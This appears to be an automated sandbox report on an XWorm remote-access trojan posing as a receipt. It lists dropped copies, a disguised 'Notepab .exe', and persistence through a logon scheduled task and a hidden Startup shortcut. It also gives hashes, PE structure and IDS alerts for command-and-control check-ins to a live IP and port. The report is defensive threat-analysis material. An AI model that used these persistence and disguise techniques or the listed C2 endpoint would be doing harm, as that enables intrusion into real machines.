              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5cvjkrs.jsh.ps1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlawdyoy.qrs.ps1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w52wikhr.yc2.psm1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wf53dzms.owi.ps1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xi3r042f.0tn.psm1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\tmp912F.tmp

              Download File
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:XML 1.0 document, ASCII text
              Category:dropped
              Size (bytes):1582
              Entropy (8bit):5.104796145255017
              Encrypted:false
              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtYxvn:cgergYrFdOFzOzN33ODOiDdKrsuT4v
              MD5:25CB61A0C8E9EFD57FCC4EAF781BE7B3
              SHA1:4BB162D10D3028A543D2CFAC511770660D98CAB3
              SHA-256:BC6379D7481D70099BA403DB5114B4785A13A6AB1F2BE22C56AD3948AE2BF042
              SHA-512:1CEA50E20CC3D1A839116660BC6AF7FEE7452173281C52424A13A09282D17204455483A57563FFD9CF043E8A13A248BDE223BE102FD3586E29417BC8E01876AE
              Malicious:true
              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

              C:\Users\user\AppData\Local\Temp\tmpA553.tmp

              Download File
              Process:C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
              File Type:XML 1.0 document, ASCII text
              Category:dropped
              Size (bytes):1582
              Entropy (8bit):5.104796145255017
              Encrypted:false
              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtYxvn:cgergYrFdOFzOzN33ODOiDdKrsuT4v
              MD5:25CB61A0C8E9EFD57FCC4EAF781BE7B3
              SHA1:4BB162D10D3028A543D2CFAC511770660D98CAB3
              SHA-256:BC6379D7481D70099BA403DB5114B4785A13A6AB1F2BE22C56AD3948AE2BF042
              SHA-512:1CEA50E20CC3D1A839116660BC6AF7FEE7452173281C52424A13A09282D17204455483A57563FFD9CF043E8A13A248BDE223BE102FD3586E29417BC8E01876AE
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

              C:\Users\user\AppData\Roaming\JvkAPBBIe.exe

              Download File
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):752128
              Entropy (8bit):7.377381110159069
              Encrypted:false
              SSDEEP:12288:jO1tqPiq7EYBnIsLC304C75kt6WG6RF6yRQxgiDkX1pKP/ehdAA:jO1tM3RpUS7o6WG6T2KiAXaiA
              MD5:7B8044F78E70383A436EBBAE2DF47808
              SHA1:002DE1BB6AA1D9EF1A3F107CB7F5615BE50F27A7
              SHA-256:B10E44DDFE6CAFF1127A964D4A5B9EBDBF9E92A24C2A2957E044DD45B14E8967
              SHA-512:F55144EA7F477868ABEB84F558B3E6F670AA1B3B35AD3490B8C6FC54C25033AD04ABA098F2DB0DC601C0F17B88978621800EE79818F00FD0974C9E881B244F42
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 68%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...po................0.................. ... ....@.. ....................................@.....................................O.... ..................................p............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc...............x..............@..B........................H.......d...`.......(....X..({...........................................0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*V....{....s....o.....*Z..{....%-.&+...o.....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*V....{....s....o.....*Z..{....%-.&+...o.....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|....

              C:\Users\user\AppData\Roaming\JvkAPBBIe.exe:Zone.Identifier

              Download File
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Preview:[ZoneTransfer]....ZoneId=0

              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab .lnk

              Download File
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Dec 24 09:27:08 2024, mtime=Tue Dec 24 09:27:08 2024, atime=Tue Dec 24 09:27:08 2024, length=752128, window=hide
              Category:dropped
              Size (bytes):772
              Entropy (8bit):5.047768663207275
              Encrypted:false
              SSDEEP:12:8Ri4fxIC88CATlsY//b5LuSRs6kOjASNHlDORWMbhmV:85fw8XZRuGlPASLCwMbhm
              MD5:516D1CB1DE7CD26FB9F12BA1E5298BBA
              SHA1:8EEBF3AFE7F8163A9F15005C40E9564499B730C8
              SHA-256:EA0211696A98D837D85138E1188C8636CE4905EE0A09737AD4354EC0A6E1AAE2
              SHA-512:44EE19F1F4EF62DA13C78B583D7F4AC956992625B1BC9D11D19B5318DC395C18986D36CD26BBBF6868BBDAE15C61B1483CC12C8F7D1980C1DB63100221461A81
              Malicious:false
              Preview:L..................F.... ....-.c.U...-.c.U...-.c.U...z......................z.:..DG..Yr?.D..U..k0.&...&...... M.......jZ.U....Jc.U......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y`S....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......YbS..Roaming.@......DWSl.YbS....C.....................`.D.R.o.a.m.i.n.g.....f.2..z...YeS .NOTEPA~1.EXE..J......YeS.YeS..........................#e..N.o.t.e.p.a.b. ...e.x.e.......[...............-.......Z...........R.N......C:\Users\user\AppData\Roaming\Notepab .exe........\.....\.....\.....\.....\.N.o.t.e.p.a.b. ...e.x.e.`.......X.......618321...........hT..CrF.f4... .d.2=.b...,...W..hT..CrF.f4... .d.2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

              C:\Users\user\AppData\Roaming\Notepab .exe

              Download File
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):752128
              Entropy (8bit):7.377381110159069
              Encrypted:false
              SSDEEP:12288:jO1tqPiq7EYBnIsLC304C75kt6WG6RF6yRQxgiDkX1pKP/ehdAA:jO1tM3RpUS7o6WG6T2KiAXaiA
              MD5:7B8044F78E70383A436EBBAE2DF47808
              SHA1:002DE1BB6AA1D9EF1A3F107CB7F5615BE50F27A7
              SHA-256:B10E44DDFE6CAFF1127A964D4A5B9EBDBF9E92A24C2A2957E044DD45B14E8967
              SHA-512:F55144EA7F477868ABEB84F558B3E6F670AA1B3B35AD3490B8C6FC54C25033AD04ABA098F2DB0DC601C0F17B88978621800EE79818F00FD0974C9E881B244F42
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 68%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...po................0.................. ... ....@.. ....................................@.....................................O.... ..................................p............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc...............x..............@..B........................H.......d...`.......(....X..({...........................................0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*V....{....s....o.....*Z..{....%-.&+...o.....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*V....{....s....o.....*Z..{....%-.&+...o.....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|....

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.377381110159069
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              • Win32 Executable (generic) a (10002005/4) 49.78%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              File name:Recaipt202431029.exe
              File size:752'128 bytes
              MD5:7b8044f78e70383a436ebbae2df47808
              SHA1:002de1bb6aa1d9ef1a3f107cb7f5615be50f27a7
              SHA256:b10e44ddfe6caff1127a964d4a5b9ebdbf9e92a24c2a2957e044dd45b14e8967
              SHA512:f55144ea7f477868abeb84f558b3e6f670aa1b3b35ad3490b8c6fc54c25033ad04aba098f2db0dc601c0f17b88978621800ee79818f00fd0974c9e881b244f42
              SSDEEP:12288:jO1tqPiq7EYBnIsLC304C75kt6WG6RF6yRQxgiDkX1pKP/ehdAA:jO1tM3RpUS7o6WG6T2KiAXaiA
              TLSH:0BF4BEE06744C526D8A757B88833E2B766336E4EAC54C60E2EC5FE9F7C32742041799B
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...po................0.................. ... ....@.. ....................................@................................

              File Icon

              Icon Hash:2eec8e8cb683b9b1

              Static PE Info

              General

              Entrypoint:0x4a060a
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0xCBDF6F70 [Sun May 22 04:05:04 2078 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

              Entrypoint Preview

              Instruction
              jmp dword ptr [00402000h]
              add dword ptr [eax], eax
              add byte ptr [eax], al
              add al, byte ptr [eax]
              add byte ptr [eax], al
              add al, 00h
              add byte ptr [eax], al
              or byte ptr [eax], al
              add byte ptr [eax], al
              adc byte ptr [eax], al
              add byte ptr [eax], al
              and byte ptr [eax], al
              add byte ptr [eax], al
              inc eax
              add byte ptr [eax], al
              add byte ptr [eax+00000000h], al
              add dword ptr [eax], eax
              add byte ptr [eax], al
              add al, byte ptr [eax]
              add byte ptr [eax], al
              add al, 00h
              add byte ptr [eax], al
              or byte ptr [eax], al
              add byte ptr [eax], al
              adc byte ptr [eax], al
              add byte ptr [eax], al
              and byte ptr [eax], al
              add byte ptr [eax], al
              inc eax
              add byte ptr [eax], al
              add byte ptr [eax+00530000h], al
              jns 00007F68F0F96BE2h
              jnc 00007F68F0F96BE2h
              je 00007F68F0F96BE2h
              add byte ptr [ebp+00h], ch
              add byte ptr [edx+00h], dl
              add byte ptr [esi+00h], ah
              insb
              add byte ptr [ebp+00h], ah
              arpl word ptr [eax], ax
              je 00007F68F0F96BE2h
              imul eax, dword ptr [eax], 006E006Fh
              add byte ptr [ecx+00h], al
              jnc 00007F68F0F96BE2h
              jnc 00007F68F0F96BE2h
              add byte ptr [ebp+00h], ch
              bound eax, dword ptr [eax]
              insb
              add byte ptr [ecx+00h], bh
              add byte ptr [eax], al
              add byte ptr [eax], al
              dec esp
              add byte ptr [edi+00h], ch
              popad
              add byte ptr [eax+eax+00h], ah
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0xa05b80x4f.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x18c8c.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0xbc0000xc.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x9d3ec0x70.text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x20000x9e6900x9e8004593e5d435bfd29157b08d343364c08aFalse0.8612434074329653data7.62917059033493IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc0xa20000x18c8c0x18e00cc0017cb524f02e755241f87ea3c956eFalse0.14699473932160803data4.3379715805866805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0xbc0000xc0x200a1831f5ab52f638442aaeef02604d522False0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0xa21f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.2649377593360996
              RT_ICON0xa47980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.3646810506566604
              RT_ICON0xa58400x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5549645390070922
              RT_ICON0xa5ca80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/m0.18115257439773264
              RT_ICON0xa9ed00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m0.0959718443156276
              RT_GROUP_ICON0xba6f80x4cdata0.7631578947368421
              RT_VERSION0xba7440x35cdata0.42093023255813955
              RT_MANIFEST0xbaaa00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

              Imports

              DLLImport
              mscoree.dll_CorExeMain

              Network Behavior

              Suricata IDS Alerts

              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2024-12-24T11:27:29.137140+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:27:29.157026+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:27:34.318395+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:27:42.161478+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:27:42.163195+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:27:55.176764+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:27:55.182702+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:28:04.239989+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:28:08.110138+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:28:08.111637+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:28:17.962675+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:28:17.964947+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:28:18.154571+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:28:18.156536+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:28:30.317032+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:28:30.322102+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:28:33.489741+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:28:33.681536+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:28:33.797868+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:28:33.917464+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:28:34.332061+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:28:44.253983+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:28:44.258854+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:28:51.800841+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:28:51.812752+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:28:53.785176+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:28:53.788402+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:02.974065+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:02.975687+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:04.441147+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:04.863672+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:05.262060+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:05.264129+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:05.551152+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:06.284365+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:06.288161+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:11.643652+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:11.645831+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:17.315188+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:17.316966+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:17.582556+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:17.584264+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:17.776910+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:17.896637+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:19.190382+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:19.192354+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:24.783837+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:24.786409+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:34.346903+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
